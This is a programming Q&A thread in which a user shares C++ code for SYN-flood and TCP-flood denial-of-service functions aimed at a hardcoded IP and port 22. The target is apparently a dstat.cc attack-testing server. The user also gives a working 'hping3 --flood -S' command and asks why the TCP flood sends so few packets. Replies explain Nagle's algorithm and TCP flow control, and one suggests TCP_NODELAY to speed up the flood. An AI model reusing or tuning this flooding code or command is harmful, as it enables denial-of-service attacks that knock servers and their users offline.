TCP packets don't show up on the server C++
I'm trying to flood a server placed on dstat.cc, but it doesn't work as I expected.
Here's the code
#include <iostream>
#include <thread>
#include <vector>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <csignal>
#include <cstring>

std::string dest_ip;

unsigned int dest_port;
unsigned int junk_length = 5;
unsigned int thread_count = 1;

sockaddr_in dest;
timeval timeout;

std::string alphanum = "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz";
int alphanum_size = alphanum.length();

// helpers

std::string rand_str(int length)
{
    std::string result;
    for (int i = 0; i < length; i++) result += alphanum[rand() % (alphanum_size - 1)];
    return result;
}

/* ------------------------- flood methods ------------------------- */

// ------- //

// do not require special privileges
void syn_flood()
{
    while (true)
    {
        int sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (sockfd < 0) std::cerr << "\nSocket creation error. Errno: " << errno;
        setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof(timeout));
        int connection_status = connect(sockfd, (sockaddr*) &dest, sizeof(dest));
        close(sockfd);
    }
}

// ------- //

void tcp_flood()
{
    while (true)
    {
        int sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        int connection_status = connect(sockfd, (sockaddr*) &dest, sizeof(dest));
    
        if (connection_status == 0)
        {
            while (true)
            {
                std::string junk = rand_str(junk_length);
                send(sockfd, junk.c_str(), junk.length(), 0);
            }
        }
        else 
        {
            close(sockfd);
            std::cout << "Connection error. Errno: " << errno;
            exit(1);
        }
    }
}

// ------- //

/* ----------------------------------------------------------------- */

int main(int argc, char* argv[])
{
    /* startup */
    dest_ip = "168.119.255.140"; // dstat.cc Live Layer 4 - Protected - Hetzner - 1 IP
    dest_port = 22; // target TCP port.

    dest.sin_family = AF_INET;
    dest.sin_port = htons(dest_port);
    inet_pton(AF_INET, dest_ip.c_str(), &dest.sin_addr);

    // timeout.tv_sec = 0; setting minimal timeout for syn_flood function
    // timeout.tv_usec = 1;
    // syn_flood();

    tcp_flood();

    return 0;
}

the syn_flood works fine and generates 1k packets per second on the graph. But the tcp_flood generates practically nothing. I mean, it generates 30 packets per second or something but it's really weird because I have a normal network connection.
Before this, I tried other tools (including my own written on C#), and flood like this worked fine.
Also, the problem occurs whenever I try to send raw tcp packet with raw socket. It just don't show up on the graph in dstat.cc.
What even is the problem?
UPD: Working flooder example
now i'm using hping3 tool
sudo hping3 168.119.255.140 --flood -S -p 22
UPD 2: I checked outgoing traffic on my pc. tcp_flood function still generates 20-30 packets per second, so the problem is only on my side.

Have you checked with wireshark to see that the packets are going out?

i've checked with other tool named bmon, i checked my working net interface and yes, there was an outgoing traffic.

Perhaps the ISP have installed some filters. Does your C# program still work?

i can't test it right now but i tried other utility that worked fine. Check the update.

tcp_flood will not send variable sized packets as fast as possible but TCP will wait a bit in order to create larger packets with less overhead - see https://en.wikipedia.org/wiki/Nagle%27s_algorithm. Even if you switch this off TCP still has flow control and will only send data as fast as the other kind can receive and ack it, with some dynamic window on how many data can be unacknowledged. So you cannot flood the server this way unless the server wants to be flooded. This is different from UDP, i.e. your hping3 example.

Also, in your example you try to flood the SSH port without speaking the SSH protocol. The server will simply close the connection when you do this but you will not realize this since you don't check the return value of send.

Steffen Ullrich, can you please explain, why did you said that i did UDP attack using hping3 tool if i did syn flood? i honestly dont know. I always thought that this kind of attack named "tcp syn flood" but not "udp flood"

Since your junk strings are very small, it might be that Nagle algorithm is keeping them buffered. Try either increasing the junk size to a few hundred bytes, or disable the buffering using:
int noDelay = 1;
setsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, &noDelay, sizeof(noDelay));


did not helped :(
